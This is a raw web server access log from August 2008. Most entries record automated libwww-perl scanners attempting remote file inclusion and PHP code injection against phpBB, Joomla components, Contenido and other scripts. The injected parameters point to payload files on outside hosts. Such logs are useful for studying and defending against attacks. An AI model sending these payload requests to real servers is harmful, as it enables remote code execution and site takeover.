70.86.229.242 - - [19/Aug/2008:11:34:00 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.186.26 - - [19/Aug/2008:11:34:00 -0700] "GET /logs/access_080805.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.186.26 - - [19/Aug/2008:11:34:00 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.186.26 - - [19/Aug/2008:11:34:03 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:34:10 -0700] "GET /logs/access_080805.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:34:11 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:34:11 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:11:34:20 -0700] "GET //codebb/pass_code.php?phpbb_root_path=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.212.186.26 - - [19/Aug/2008:11:34:23 -0700] "GET /logs/access_080805.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.186.26 - - [19/Aug/2008:11:34:24 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.186.26 - - [19/Aug/2008:11:34:24 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
86.58.154.237 - - [19/Aug/2008:11:34:40 -0700] "GET /logs/access_080530.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.189.211.14 - - [19/Aug/2008:11:34:46 -0700] "GET /logs/access_080720.log/contenido.php?sec=http://web4cc.t35.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.189.211.14 - - [19/Aug/2008:11:34:48 -0700] "GET /contenido.php?sec=http://web4cc.t35.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.6 - - [19/Aug/2008:11:34:56 -0700] "GET /logs/access_080718.log//include/lib.inc.php?site_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.189.211.14 - - [19/Aug/2008:11:35:03 -0700] "GET /logs/contenido.php?sec=http://web4cc.t35.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
190.83.18.253 - - [19/Aug/2008:11:35:05 -0700] "GET /logs/access_080626.log/phpSecurePages/secure.php?&cfgProgDir=http://www.darahost.com/webcards/images/idbr.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.83.18.253 - - [19/Aug/2008:11:35:05 -0700] "GET /logs/phpSecurePages/secure.php?&cfgProgDir=http://www.darahost.com/webcards/images/idbr.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.83.18.253 - - [19/Aug/2008:11:35:06 -0700] "GET /phpSecurePages/secure.php?&cfgProgDir=http://www.darahost.com/webcards/images/idbr.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:35:12 -0700] "GET /logs/access_080805.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:35:12 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:35:12 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
86.58.154.237 - - [19/Aug/2008:11:35:28 -0700] "GET /logs/access_080526.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.98.1.215 - - [19/Aug/2008:11:35:31 -0700] "GET /inurl:%22com_kochsuite%22http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.98.1.215 - - [19/Aug/2008:11:35:31 -0700] "GET /logs/inurl:%22com_kochsuite%22http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.98.1.215 - - [19/Aug/2008:11:35:31 -0700] "GET /inurl:%22com_kochsuite%22http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
65.98.67.106 - - [19/Aug/2008:11:35:33 -0700] "GET /logs/access_080720.log//modules/netcat/index.php?DOCUMENT_ROOT=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
151.11.24.250 - - [19/Aug/2008:11:35:43 -0700] "GET /logs/access_080812.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://c0d3d57.t35.com/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [19/Aug/2008:11:35:44 -0700] "GET /logs/access_080312.log//index.php?view=page&pagename=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [19/Aug/2008:11:35:46 -0700] "GET //index.php?view=page&pagename=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 200 8018 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [19/Aug/2008:11:35:47 -0700] "GET /logs//index.php?view=page&pagename=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.98.1.215 - - [19/Aug/2008:11:35:54 -0700] "GET /logs/inurl:%22com_kochsuite%22http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.98.1.215 - - [19/Aug/2008:11:35:54 -0700] "GET /inurl:%22com_kochsuite%22http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
67.212.186.26 - - [19/Aug/2008:11:36:05 -0700] "GET /logs/access_080628.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.98.1.215 - - [19/Aug/2008:11:36:11 -0700] "GET /logs/access_080810.log/inurl:%22com_kochsuite%22http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.98.1.215 - - [19/Aug/2008:11:36:11 -0700] "GET /inurl:%22com_kochsuite%22http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.98.1.215 - - [19/Aug/2008:11:36:12 -0700] "GET /logs/access_080624.log/inurl:%22com_kochsuite%22http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
151.11.24.250 - - [19/Aug/2008:11:36:12 -0700] "GET /logs/access_080805.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://c0d3d57.t35.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.189.211.14 - - [19/Aug/2008:11:36:13 -0700] "GET /logs/access_080725.log/contenido.php?sec=http://web4cc.t35.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:11:36:33 -0700] "GET /logs/access_080125.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:11:36:34 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:11:36:34 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:11:36:36 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/?D=A HTTP/1.0" 200 14161 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:36:36 -0700] "GET /logs/access_080628.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
86.58.154.237 - - [19/Aug/2008:11:36:48 -0700] "GET /logs/access_080606.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.58.154.237 - - [19/Aug/2008:11:36:49 -0700] "GET /logs/access_080615.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:36:51 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:36:54 -0700] "GET /logs/access_080628.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:36:55 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.186.26 - - [19/Aug/2008:11:36:57 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.186.26 - - [19/Aug/2008:11:36:57 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.25.170.22 - - [19/Aug/2008:11:37:12 -0700] "GET /logs/config.php?path_to_root=http://69.89.27.230/~williamd/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.25.170.22 - - [19/Aug/2008:11:37:12 -0700] "GET /config.php?path_to_root=http://69.89.27.230/~williamd/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.248.62.98 - - [19/Aug/2008:11:37:30 -0700] "GET /logs/access_080606.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.248.62.98 - - [19/Aug/2008:11:37:31 -0700] "GET /logs/access_080615.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.130.198.38 - - [19/Aug/2008:11:37:33 -0700] "GET /logs/config.php?path_to_root=http://69.89.27.230/~williamd/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.198.38 - - [19/Aug/2008:11:37:34 -0700] "GET /config.php?path_to_root=http://69.89.27.230/~williamd/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.38.54.160 - - [19/Aug/2008:11:37:41 -0700] "GET /logs/access_080713.log/errors.php?error=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:11:37:47 -0700] "GET /logs/access_080804.log/errors.php?error=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:11:37:47 -0700] "GET /errors.php?error=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:11:37:47 -0700] "GET /logs/errors.php?error=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.212.186.26 - - [19/Aug/2008:11:37:49 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.98.1.215 - - [19/Aug/2008:11:38:03 -0700] "GET /logs/access_080624.log/inurl:%22com_kochsuite%22http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.98.1.215 - - [19/Aug/2008:11:38:03 -0700] "GET /inurl:%22com_kochsuite%22http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.98.1.215 - - [19/Aug/2008:11:38:03 -0700] "GET /logs/inurl:%22com_kochsuite%22http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
218.38.54.160 - - [19/Aug/2008:11:38:03 -0700] "GET /logs/access_080626.log/errors.php?error=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.98.1.215 - - [19/Aug/2008:11:38:10 -0700] "GET /logs/access_080730.log/inurl:%22com_kochsuite%22http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:38:13 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.186.26 - - [19/Aug/2008:11:38:18 -0700] "GET /logs/access_080628.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:38:19 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:38:32 -0700] "GET /logs/access_080628.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:11:38:48 -0700] "GET /logs/access_080408.log/errors.php?error=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.212.186.26 - - [19/Aug/2008:11:39:00 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.186.26 - - [19/Aug/2008:11:39:27 -0700] "GET /logs/access_080626.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.17.129.24 - - [19/Aug/2008:11:39:27 -0700] "GET /logs//include/write.php?dir=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.212.186.26 - - [19/Aug/2008:11:39:28 -0700] "GET /logs/access_080627.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:39:30 -0700] "GET /logs/access_080628.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.17.129.24 - - [19/Aug/2008:11:39:34 -0700] "GET //include/write.php?dir=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.189.211.14 - - [19/Aug/2008:11:39:36 -0700] "GET /home.php?pagina=http://web4cc.t35.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.189.211.14 - - [19/Aug/2008:11:39:36 -0700] "GET /logs/access_080806.log/home.php?pagina=http://web4cc.t35.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.131.81 - - [19/Aug/2008:11:39:37 -0700] "GET /logs/index.php?option=com_philaform&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
66.103.131.81 - - [19/Aug/2008:11:39:38 -0700] "GET /index.php?option=com_philaform&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do?? HTTP/1.1" 200 9914 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:39:46 -0700] "GET /logs/access_080626.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:39:54 -0700] "GET /logs/access_080627.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:39:57 -0700] "GET /logs/access_080626.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
190.83.18.253 - - [19/Aug/2008:11:39:58 -0700] "GET /logs/access_080626.log/phpSecurePages/secure.php?&cfgProgDir=http://www.darahost.com/webcards/images/idbr.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.83.18.253 - - [19/Aug/2008:11:39:58 -0700] "GET /phpSecurePages/secure.php?&cfgProgDir=http://www.darahost.com/webcards/images/idbr.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.83.18.253 - - [19/Aug/2008:11:39:58 -0700] "GET /logs/phpSecurePages/secure.php?&cfgProgDir=http://www.darahost.com/webcards/images/idbr.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:39:59 -0700] "GET /logs/access_080627.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
218.189.211.14 - - [19/Aug/2008:11:40:00 -0700] "GET /logs/home.php?pagina=http://web4cc.t35.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.189.211.14 - - [19/Aug/2008:11:40:23 -0700] "GET /logs/access_080807.log/home.php?pagina=http://web4cc.t35.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.11.12.134 - - [19/Aug/2008:11:41:00 -0700] "GET /logs/access_080510.log/principal.php?conteudo=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.11.12.134 - - [19/Aug/2008:11:41:01 -0700] "GET /principal.php?conteudo=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.11.12.134 - - [19/Aug/2008:11:41:02 -0700] "GET /logs/principal.php?conteudo=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.84.19.133 - - [19/Aug/2008:11:41:03 -0700] "GET /logs/access_080606.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.84.19.133 - - [19/Aug/2008:11:41:04 -0700] "GET /logs/access_080615.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.84.19.133 - - [19/Aug/2008:11:41:17 -0700] "GET /logs/access_080606.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.84.19.133 - - [19/Aug/2008:11:41:18 -0700] "GET /logs/access_080615.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.47.236.56 - - [19/Aug/2008:11:41:35 -0700] "GET /logs/index.php?option=com_philaform&Itemid=&mosConfig_absolute_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
151.11.24.250 - - [19/Aug/2008:11:41:36 -0700] "GET /logs/access_080704.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://c0d3d57.t35.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.47.236.56 - - [19/Aug/2008:11:41:36 -0700] "GET /index.php?option=com_philaform&Itemid=&mosConfig_absolute_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 200 9991 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
151.11.24.250 - - [19/Aug/2008:11:41:44 -0700] "GET /logs/access_080708.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://c0d3d57.t35.com/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [19/Aug/2008:11:41:44 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://c0d3d57.t35.com/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [19/Aug/2008:11:41:44 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://c0d3d57.t35.com/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.84.19.133 - - [19/Aug/2008:11:41:52 -0700] "GET /logs/access_080530.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.212.186.26 - - [19/Aug/2008:11:42:10 -0700] "GET /logs/access_080626.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.186.26 - - [19/Aug/2008:11:42:11 -0700] "GET /logs/access_080627.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:42:15 -0700] "GET /logs/access_080805.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:42:15 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:42:15 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:11:42:25 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/?S=A HTTP/1.0" 200 14161 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
91.84.19.133 - - [19/Aug/2008:11:42:27 -0700] "GET /logs/access_080526.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.69.246.191 - - [19/Aug/2008:11:42:50 -0700] "GET /logs/middle.php?page=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
